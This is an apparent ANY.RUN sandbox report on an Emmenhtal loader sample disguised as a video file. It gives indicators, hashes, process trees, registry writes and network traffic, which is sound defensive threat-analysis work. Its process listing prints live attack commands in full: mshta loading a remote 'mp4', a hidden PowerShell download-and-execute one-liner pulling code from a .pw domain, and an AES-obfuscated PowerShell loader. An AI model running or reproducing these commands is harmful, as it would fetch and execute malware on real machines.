File name:

savecoupons.shopsingl6.mp4.ps1.ps1

Full analysis: https://app.any.run/tasks/376765bb-0971-4212-bc37-d26e6dcbf44b
Verdict: Malicious activity
Threats:

First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments.

Malware Trends Tracker     >>>
Analysis date: December 20, 2024, 19:59:52
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
emmenhtal
loader
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with no line terminators
MD5:

156D32308B8FE5E28F84F58CC5554306

SHA1:

C81768570930123B786A2652E1A5652267B227B2

SHA256:

4F11A7618067B45EAEE1A7026C866D7F3B57834711F46226AF4B1337CF3D8DBE

SSDEEP:

3:LuVlCIKsexqQVaKuKTLESZt+RbqRF4I1yMQRWL7Mn:SVlCI/eohKuKTIA0IMPy7Mn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 4672)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5728)
      • powershell.exe (PID: 3224)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5460)
      • powershell.exe (PID: 3224)

    • EMMENHTAL loader has been detected

      • powershell.exe (PID: 5728)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 5728)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 5728)
      • powershell.exe (PID: 3224)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 5728)

  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 5728)
      • powershell.exe (PID: 3224)

    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 4672)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 4672)
      • powershell.exe (PID: 5728)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 4672)
      • powershell.exe (PID: 5728)

    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 5728)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 5728)

    • Probably download files using WebClient

      • powershell.exe (PID: 5728)

    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 5728)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3224)

  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 4672)
      • powershell.exe (PID: 3224)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 4672)

    • The process uses the downloaded file

      • powershell.exe (PID: 5460)
      • mshta.exe (PID: 4672)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5728)
      • powershell.exe (PID: 3224)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 5728)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 5728)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 5728)

    • Disables trace logs

      • powershell.exe (PID: 3224)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
128
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs mshta.exe #EMMENHTAL powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3224"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
3364\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3436\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3436\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4672"C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4 C:\Windows\System32\mshta.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
5460"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\savecoupons.shopsingl6.mp4.ps1.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
5728"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1047B4CA5F5C3136955E90288D0CF771D4EDB3C9D787D81A22FA1D19D50DBC83BC87F1DCA44B36AD85C9385793AFD75CBEBC74C6D267B19EA7B471F3AA348B616B1DBAA4A77832B7A57A91B94748F0F93B2D08F4BC95283A1D6EF07728C7091AF8F56E69DE9EA56CA801CD0A7E62F5CDFAE51540ACFCB025D5E940A9075C8DA17758CDC6A94DC6B6D01EB23E488BA9A1371F56D19500FE2B8FB10BA9B54801012917F04D36326F74A108C2D0B9AD4FB51DA2F8BA2777F37564F5B6B6E926E7121E3462FF03AAE5966558C3283C1548AC5074916DB8A685025AD4BB17E389AAE7C4C89FE3D49A5B7CBB890755B7CBC935D1185DE2AFF91099EC236AF765EB3039E9561D484E095F1874255D784C682A4B088C008559D9426482954EA469C7570756');$BIAG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((cDnCn('4C50475A727A72534D6D4F70764E7061')),[byte[]]::new(16)).TransformFinalBlock($Lhmk,0,$Lhmk.Length)); & $BIAG.Substring(0,3) $BIAG.Substring(129)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events
23 921
Read events
23 904
Write events
17
Delete events
0

Modification events

(PID) Process:(4672) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(4672) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(4672) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(3224) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3224) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3224) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3224) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(3224) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(3224) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3224) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
0
Suspicious files
6
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
5460powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF135edc.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
3224powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x4gjys1h.uhe.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5460powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fkj2042j.1yu.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4672mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\singl6[1].mp4binary
MD5:543530C3B4038086637ACCF9D95397D6
SHA256:D070FAD55BE0D3269DBEBB1DE70652D82D48F0AD849F960D27D3E71018EB208C
5728powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_k5quvp3p.p33.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3224powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3tblitdx.p5o.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3224powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8B8A832FCE2174C8FEE26B70F2483FBB
SHA256:0FBA3A37EF443507F533A7C3F31C0B5826EA416B95FDE43479E02D4E0C29400B
5460powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lpw2smmf.vij.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5460powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MDFN3LNX8HOT02C00CJ.tempbinary
MD5:FC907FED968075C50DF74F19DCAFB249
SHA256:30A275F962BB8E2CF731064DCF8FF8BA2F2DE0546C2FF3CAD3FE585ABFF5C834
5460powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:FC907FED968075C50DF74F19DCAFB249
SHA256:30A275F962BB8E2CF731064DCF8FF8BA2F2DE0546C2FF3CAD3FE585ABFF5C834
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
22
DNS requests
9
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2356
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3696
RUXIMICS.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2356
svchost.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
3696
RUXIMICS.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
104.21.37.173:443
https://journal.liveview.pw/singl6.vsdx
unknown
text
8.68 Mb
GET
200
188.114.97.3:443
https://savecoupons.shop/singl6.mp4
unknown
binary
627 Kb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3696
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2356
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.23.209.189:443
www.bing.com
Akamai International B.V.
GB
whitelisted
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2356
svchost.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
3696
RUXIMICS.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2356
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
www.bing.com
  • 2.23.209.189
  • 2.23.209.140
  • 2.23.209.130
  • 2.23.209.149
  • 2.23.209.179
  • 2.23.209.133
  • 2.23.209.187
  • 2.23.209.182
whitelisted
google.com
  • 142.250.185.142
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
savecoupons.shop
  • 188.114.97.3
  • 188.114.96.3
unknown
www.microsoft.com
  • 88.221.169.152
whitelisted
journal.liveview.pw
  • 172.67.210.199
  • 104.21.37.173
unknown
self.events.data.microsoft.com
  • 104.208.16.92
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.pw domain - Likely Hostile
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
savecoupons.shopsingl6.mp4.ps1.ps1